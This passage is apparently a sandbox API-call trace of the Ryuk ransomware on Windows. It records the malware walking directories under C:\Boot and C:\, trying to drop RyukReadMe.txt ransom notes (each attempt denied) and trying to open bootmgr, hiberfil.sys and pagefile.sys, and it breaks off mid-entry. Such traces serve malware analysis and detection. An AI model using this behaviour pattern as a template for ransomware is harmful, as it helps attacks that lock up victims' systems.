CreateFileW (lpFileName="C:\\Boot\\pl-PL\\RyukReadMe.txt" (normalized: "c:\\boot\\pl-pl\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.498] GetLastError () returned 0x5 [0131.498] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0131.498] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.498] FindNextFileW (in: hFindFile=0x3c7120, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0131.498] SetLastError (dwErrCode=0x0) [0131.498] CreateFileW (lpFileName="C:\\Boot\\RyukReadMe.txt" (normalized: "c:\\boot\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.498] GetLastError () returned 0x5 [0131.499] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0131.499] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.499] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-BR\\*.*", lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0x3c3ef0 [0131.499] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0131.499] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0131.499] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0 [0131.499] FindClose (in: hFindFile=0x3c3ef0 | out: hFindFile=0x3c3ef0) returned 1 [0131.500] SetLastError (dwErrCode=0x0) [0131.500] CreateFileW (lpFileName="C:\\Boot\\pt-BR\\RyukReadMe.txt" (normalized: "c:\\boot\\pt-br\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.500] GetLastError () returned 0x5 [0131.500] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0131.500] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.500] FindNextFileW (in: hFindFile=0x3c7120, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0131.500] SetLastError (dwErrCode=0x0) [0131.500] CreateFileW (lpFileName="C:\\Boot\\RyukReadMe.txt" (normalized: "c:\\boot\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.500] GetLastError () returned 0x5 [0131.500] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0131.500] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.500] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-PT\\*.*", lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0x3c3ef0 [0131.500] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0131.500] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0131.500] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0 [0131.501] FindClose (in: hFindFile=0x3c3ef0 | out: hFindFile=0x3c3ef0) returned 1 [0131.501] SetLastError (dwErrCode=0x0) [0131.501] CreateFileW (lpFileName="C:\\Boot\\pt-PT\\RyukReadMe.txt" (normalized: "c:\\boot\\pt-pt\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.501] GetLastError () returned 0x5 [0131.501] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0131.501] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.501] FindNextFileW (in: hFindFile=0x3c7120, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0131.501] SetLastError (dwErrCode=0x0) [0131.501] CreateFileW (lpFileName="C:\\Boot\\RyukReadMe.txt" (normalized: "c:\\boot\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.501] GetLastError () returned 0x5 [0131.501] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0131.501] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.501] FindFirstFileW (in: lpFileName="C:\\Boot\\ru-RU\\*.*", lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0x3c3ef0 [0131.502] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0131.502] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0131.502] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0 [0131.502] FindClose (in: hFindFile=0x3c3ef0 | out: hFindFile=0x3c3ef0) returned 1 [0131.502] SetLastError (dwErrCode=0x0) [0131.502] CreateFileW (lpFileName="C:\\Boot\\ru-RU\\RyukReadMe.txt" (normalized: "c:\\boot\\ru-ru\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.502] GetLastError () returned 0x5 [0131.502] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0131.502] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.502] FindNextFileW (in: hFindFile=0x3c7120, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0131.502] SetLastError (dwErrCode=0x0) [0131.502] CreateFileW (lpFileName="C:\\Boot\\RyukReadMe.txt" (normalized: "c:\\boot\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.502] GetLastError () returned 0x5 [0131.503] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0131.503] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.503] FindFirstFileW (in: lpFileName="C:\\Boot\\sv-SE\\*.*", lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0x3c3ef0 [0131.503] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0131.503] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0131.503] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0 [0131.503] FindClose (in: hFindFile=0x3c3ef0 | out: hFindFile=0x3c3ef0) returned 1 [0131.503] SetLastError (dwErrCode=0x0) [0131.503] CreateFileW (lpFileName="C:\\Boot\\sv-SE\\RyukReadMe.txt" (normalized: "c:\\boot\\sv-se\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.503] GetLastError () returned 0x5 [0131.503] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0131.503] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.503] FindNextFileW (in: hFindFile=0x3c7120, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0131.503] SetLastError (dwErrCode=0x0) [0131.503] CreateFileW (lpFileName="C:\\Boot\\RyukReadMe.txt" (normalized: "c:\\boot\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.506] GetLastError () returned 0x5 [0131.506] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0131.506] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.506] FindFirstFileW (in: lpFileName="C:\\Boot\\tr-TR\\*.*", lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0x3c3ef0 [0131.506] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0131.506] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0131.506] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0 [0131.507] FindClose (in: hFindFile=0x3c3ef0 | out: hFindFile=0x3c3ef0) returned 1 [0131.507] SetLastError (dwErrCode=0x0) [0131.507] CreateFileW (lpFileName="C:\\Boot\\tr-TR\\RyukReadMe.txt" (normalized: "c:\\boot\\tr-tr\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.507] GetLastError () returned 0x5 [0131.507] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0131.507] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.507] FindNextFileW (in: hFindFile=0x3c7120, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0131.507] SetLastError (dwErrCode=0x0) [0131.507] CreateFileW (lpFileName="C:\\Boot\\RyukReadMe.txt" (normalized: "c:\\boot\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.507] GetLastError () returned 0x5 [0131.507] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0131.507] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.507] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-CN\\*.*", lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0x3c3ef0 [0131.507] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0131.507] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0131.507] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0 [0131.507] FindClose (in: hFindFile=0x3c3ef0 | out: hFindFile=0x3c3ef0) returned 1 [0131.507] SetLastError (dwErrCode=0x0) [0131.507] CreateFileW (lpFileName="C:\\Boot\\zh-CN\\RyukReadMe.txt" (normalized: "c:\\boot\\zh-cn\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.508] GetLastError () returned 0x5 [0131.508] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0131.508] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.508] FindNextFileW (in: hFindFile=0x3c7120, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0131.508] SetLastError (dwErrCode=0x0) [0131.508] CreateFileW (lpFileName="C:\\Boot\\RyukReadMe.txt" (normalized: "c:\\boot\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.508] GetLastError () returned 0x5 [0131.508] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0131.508] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.508] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-HK\\*.*", lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0x3c3ef0 [0131.509] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0131.509] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0131.509] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0 [0131.509] FindClose (in: hFindFile=0x3c3ef0 | out: hFindFile=0x3c3ef0) returned 1 [0131.509] SetLastError (dwErrCode=0x0) [0131.509] CreateFileW (lpFileName="C:\\Boot\\zh-HK\\RyukReadMe.txt" (normalized: "c:\\boot\\zh-hk\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.509] GetLastError () returned 0x5 [0131.509] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0131.509] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.509] FindNextFileW (in: hFindFile=0x3c7120, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0131.509] SetLastError (dwErrCode=0x0) [0131.509] CreateFileW (lpFileName="C:\\Boot\\RyukReadMe.txt" (normalized: "c:\\boot\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.509] GetLastError () returned 0x5 [0131.509] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0131.509] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.509] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-TW\\*.*", lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0x3c3ef0 [0131.509] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0131.509] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0131.509] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0 [0131.510] FindClose (in: hFindFile=0x3c3ef0 | out: hFindFile=0x3c3ef0) returned 1 [0131.510] SetLastError (dwErrCode=0x0) [0131.510] CreateFileW (lpFileName="C:\\Boot\\zh-TW\\RyukReadMe.txt" (normalized: "c:\\boot\\zh-tw\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.510] GetLastError () returned 0x5 [0131.510] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0131.510] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.510] FindNextFileW (in: hFindFile=0x3c7120, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 0 [0131.510] FindClose (in: hFindFile=0x3c7120 | out: hFindFile=0x3c7120) returned 1 [0131.510] SetLastError (dwErrCode=0x0) [0131.510] CreateFileW (lpFileName="C:\\Boot\\RyukReadMe.txt" (normalized: "c:\\boot\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.510] GetLastError () returned 0x5 [0131.510] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae900, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae900, lpOverlapped=0x0) returned 0 [0131.510] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.510] FindNextFileW (in: hFindFile=0x3bcd90, lpFindFileData=0x29ae950 | out: lpFindFileData=0x29ae950) returned 1 [0131.510] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.510] SetFileAttributesW (lpFileName="C:\\bootmgr", dwFileAttributes=0x80) returned 0 [0131.510] CreateFileW (lpFileName="C:\\bootmgr" (normalized: "c:\\bootmgr"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.511] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.511] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.511] FindNextFileW (in: hFindFile=0x3bcd90, lpFindFileData=0x29ae950 | out: lpFindFileData=0x29ae950) returned 1 [0131.511] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.511] SetFileAttributesW (lpFileName="C:\\BOOTSECT.BAK", dwFileAttributes=0x80) returned 0 [0131.512] CreateFileW (lpFileName="C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.512] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.512] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.512] FindNextFileW (in: hFindFile=0x3bcd90, lpFindFileData=0x29ae950 | out: lpFindFileData=0x29ae950) returned 1 [0131.512] SetLastError (dwErrCode=0x0) [0131.512] CreateFileW (lpFileName="C:\\RyukReadMe.txt" (normalized: "c:\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.512] GetLastError () returned 0x5 [0131.512] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae900, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae900, lpOverlapped=0x0) returned 0 [0131.512] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.512] FindFirstFileW (in: lpFileName="C:\\Config.Msi\\*.*", lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 0xffffffffffffffff [0131.512] FindClose (in: hFindFile=0xffffffffffffffff | out: hFindFile=0xffffffffffffffff) returned 0 [0131.512] SetLastError (dwErrCode=0x0) [0131.512] CreateFileW (lpFileName="C:\\Config.Msi\\RyukReadMe.txt" (normalized: "c:\\config.msi\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.512] GetLastError () returned 0x5 [0131.512] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae900, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae900, lpOverlapped=0x0) returned 0 [0131.512] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.512] FindNextFileW (in: hFindFile=0x3bcd90, lpFindFileData=0x29ae950 | out: lpFindFileData=0x29ae950) returned 1 [0131.512] SetLastError (dwErrCode=0x0) [0131.512] CreateFileW (lpFileName="C:\\RyukReadMe.txt" (normalized: "c:\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.513] GetLastError () returned 0x5 [0131.513] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae900, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae900, lpOverlapped=0x0) returned 0 [0131.513] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.513] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\*.*", lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 0xffffffffffffffff [0131.513] FindClose (in: hFindFile=0xffffffffffffffff | out: hFindFile=0xffffffffffffffff) returned 0 [0131.513] SetLastError (dwErrCode=0x0) [0131.513] CreateFileW (lpFileName="C:\\Documents and Settings\\RyukReadMe.txt" (normalized: "c:\\documents and settings\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.513] GetLastError () returned 0x5 [0131.513] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae900, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae900, lpOverlapped=0x0) returned 0 [0131.513] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.513] FindNextFileW (in: hFindFile=0x3bcd90, lpFindFileData=0x29ae950 | out: lpFindFileData=0x29ae950) returned 1 [0131.513] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.513] SetFileAttributesW (lpFileName="C:\\hiberfil.sys", dwFileAttributes=0x80) returned 0 [0131.513] CreateFileW (lpFileName="C:\\hiberfil.sys" (normalized: "c:\\hiberfil.sys"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.514] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.514] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.514] FindNextFileW (in: hFindFile=0x3bcd90, lpFindFileData=0x29ae950 | out: lpFindFileData=0x29ae950) returned 1 [0131.514] SetLastError (dwErrCode=0x0) [0131.514] CreateFileW (lpFileName="C:\\RyukReadMe.txt" (normalized: "c:\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.514] GetLastError () returned 0x5 [0131.514] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae900, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae900, lpOverlapped=0x0) returned 0 [0131.514] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.514] FindFirstFileW (in: lpFileName="C:\\MSOCache\\*.*", lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 0xffffffffffffffff [0131.514] FindClose (in: hFindFile=0xffffffffffffffff | out: hFindFile=0xffffffffffffffff) returned 0 [0131.514] SetLastError (dwErrCode=0x0) [0131.514] CreateFileW (lpFileName="C:\\MSOCache\\RyukReadMe.txt" (normalized: "c:\\msocache\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.514] GetLastError () returned 0x5 [0131.514] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae900, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae900, lpOverlapped=0x0) returned 0 [0131.514] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.514] FindNextFileW (in: hFindFile=0x3bcd90, lpFindFileData=0x29ae950 | out: lpFindFileData=0x29ae950) returned 1 [0131.514] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.515] SetFileAttributesW (lpFileName="C:\\pagefile.sys", dwFileAttributes=0x80) returned 0 [0131.515] CreateFileW (lpFileName="C:\\pagefile.sys" (normalized: "c:\\pagefile.sys"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.515] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.515] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.515] FindNextFileW (in: hFindFile=0x3bcd90, lpFindFileData=0x29ae950 | out: lpFindFileData=0x29ae950) returned 1 [0131.515] SetLastError (dwErrCode=0x0) [0131.515] CreateFileW 